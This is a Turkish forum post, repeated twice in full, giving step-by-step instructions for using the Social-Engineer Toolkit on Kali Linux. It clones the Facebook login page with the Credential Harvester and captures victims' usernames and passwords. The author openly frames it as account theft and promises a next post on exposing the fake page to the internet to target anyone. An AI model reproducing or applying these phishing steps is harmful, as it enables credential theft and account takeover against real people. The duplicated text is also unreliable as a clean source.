Merhabalar Bu Gün Sizler'le Setoolkit'le Kendi İp'miz Üstünden Nasil Hesap Çalabiliriz Onu
Göstereceğim Bir Sonraki Konu'da Kendi Localhostumuzu Dünya'ya Açmayi Göstereceğim Ozaman Herkese
Yapabiliriz Bu Yöntemi Şimdi Anlatımımıza Geçelim
Terminalimizi Açip setoolkit yaziyoruz setoolkit kali linux'la beraber kendisi yüklü geliyor
1.Adimimiz -) 1) Social-Engineering Attacks Seçiyoruz
Türkçesi : Sosyal-Mühendislik Saldırıları
2.Adimimiz -) 2) Website Attack Vectors Seçiyoruz
Türkçesi : Web Sitesi Saldırı Vektörleri
3.Adimimiz -) 3) Credential Harvester Attack Method Seçiyoruz
Türkçesi : Credential Harvester Saldırı Yöntemi
4.Adimimiz -) 2) Site Cloner Seçiyoruz
Türkçesi : Site Kaynak Kod Klonu
5.Adimimiz -) Eğer Benim Gibi İp'Nız Yaziyorsa Şuan Yapicağim İşlemi Yapmanıza Gerek Yok
set:webattack> IP address for the POST back in Harvester/Tabnabbing
[192.168.2.217]:
Eğer Benim Gibi Yaptiğiniz'da İp'nız Cikmiyorsa
Tekrar'dan Başka Bir Terminal'İ Açiyoruz Ve İp'mizi Oğrenmek İçin ifconfig yaziyoruz
inet 192.168.2.217 Bende inet yaziyor sizde eth0 veya wlan0 yazabilir
6.Adimimiz -) set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.2.217]:
Yerine İp'Mizi Yaziyoruz
7.Adimimiz -) Kopyalamak İstediğimiz "Login'li" Bir Site Ben Kolay'ca Bulmak İçin
https://www.facebook.com/login.php Kullanicam
Burda Yazilanlarin İngilizcesi
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
Burda Yazilanlar Nedir Türkcesi :
Bu saldırıyı kullanmanın en iyi yolu, kullanıcı adı ve şifre formu ise
alanlar mevcuttur. Yine de, bu bir web sitesinde tüm POST'ları yakalar.
Dizin yapınızın bulunduğu yere bağlı olarak /var /www /ht
/var /www /html dosyasına kopyalamanız gerekebilir.
Burada ne dediğimizi anlıyorsanız {return} tuşuna basınız.
Sosyal-Mühendis Araç Seti Credential Harvester Attack
Credential Harvester 80 numaralı Port'da çalışıyor
Bilgi size geldiğinde size gösterilecektir:
Ve Sonuç İd Şifre Elimizde
directory traversal attempt detected from: 192.168.2.217
192.168.2.217 - - [18/Aug/2018 05:42:29] "GET /favicon.ico HTTP/1.1" 404 -
İp'im : 192.168.2.000
Giriş gün ay yil ve saat dakika saniye : [18/Aug/2018 05:42:29]
Bize Bİrçok bilgiyi sunuyor
İd Şİfre Burda yaziyor + terminalden var dosyasindan www gitiğinizde bulabilirsiniz orda'da id şifreyi
[ame]https://www.youtube.com/watch?v=5CqH2EhboT8&t=379s[/ame]
Göstereceğim Bir Sonraki Konu'da Kendi Localhostumuzu Dünya'ya Açmayi Göstereceğim Ozaman Herkese
Yapabiliriz Bu Yöntemi Şimdi Anlatımımıza Geçelim
Terminalimizi Açip setoolkit yaziyoruz setoolkit kali linux'la beraber kendisi yüklü geliyor
1.Adimimiz -) 1) Social-Engineering Attacks Seçiyoruz
Türkçesi : Sosyal-Mühendislik Saldırıları
2.Adimimiz -) 2) Website Attack Vectors Seçiyoruz
Türkçesi : Web Sitesi Saldırı Vektörleri
3.Adimimiz -) 3) Credential Harvester Attack Method Seçiyoruz
Türkçesi : Credential Harvester Saldırı Yöntemi
4.Adimimiz -) 2) Site Cloner Seçiyoruz
Türkçesi : Site Kaynak Kod Klonu
5.Adimimiz -) Eğer Benim Gibi İp'Nız Yaziyorsa Şuan Yapicağim İşlemi Yapmanıza Gerek Yok
set:webattack> IP address for the POST back in Harvester/Tabnabbing
[192.168.2.217]:
Eğer Benim Gibi Yaptiğiniz'da İp'nız Cikmiyorsa
Tekrar'dan Başka Bir Terminal'İ Açiyoruz Ve İp'mizi Oğrenmek İçin ifconfig yaziyoruz
inet 192.168.2.217 Bende inet yaziyor sizde eth0 veya wlan0 yazabilir
6.Adimimiz -) set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.2.217]:
Yerine İp'Mizi Yaziyoruz
7.Adimimiz -) Kopyalamak İstediğimiz "Login'li" Bir Site Ben Kolay'ca Bulmak İçin
https://www.facebook.com/login.php Kullanicam
Burda Yazilanlarin İngilizcesi
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
Burda Yazilanlar Nedir Türkcesi :
Bu saldırıyı kullanmanın en iyi yolu, kullanıcı adı ve şifre formu ise
alanlar mevcuttur. Yine de, bu bir web sitesinde tüm POST'ları yakalar.
Dizin yapınızın bulunduğu yere bağlı olarak /var /www /ht
/var /www /html dosyasına kopyalamanız gerekebilir.
Burada ne dediğimizi anlıyorsanız {return} tuşuna basınız.
Sosyal-Mühendis Araç Seti Credential Harvester Attack
Credential Harvester 80 numaralı Port'da çalışıyor
Bilgi size geldiğinde size gösterilecektir:
Ve Sonuç İd Şifre Elimizde
directory traversal attempt detected from: 192.168.2.217
192.168.2.217 - - [18/Aug/2018 05:42:29] "GET /favicon.ico HTTP/1.1" 404 -
İp'im : 192.168.2.000
Giriş gün ay yil ve saat dakika saniye : [18/Aug/2018 05:42:29]
Bize Bİrçok bilgiyi sunuyor
İd Şİfre Burda yaziyor + terminalden var dosyasindan www gitiğinizde bulabilirsiniz orda'da id şifreyi
[ame]https://www.youtube.com/watch?v=5CqH2EhboT8&t=379s[/ame]
Son düzenleme:
)
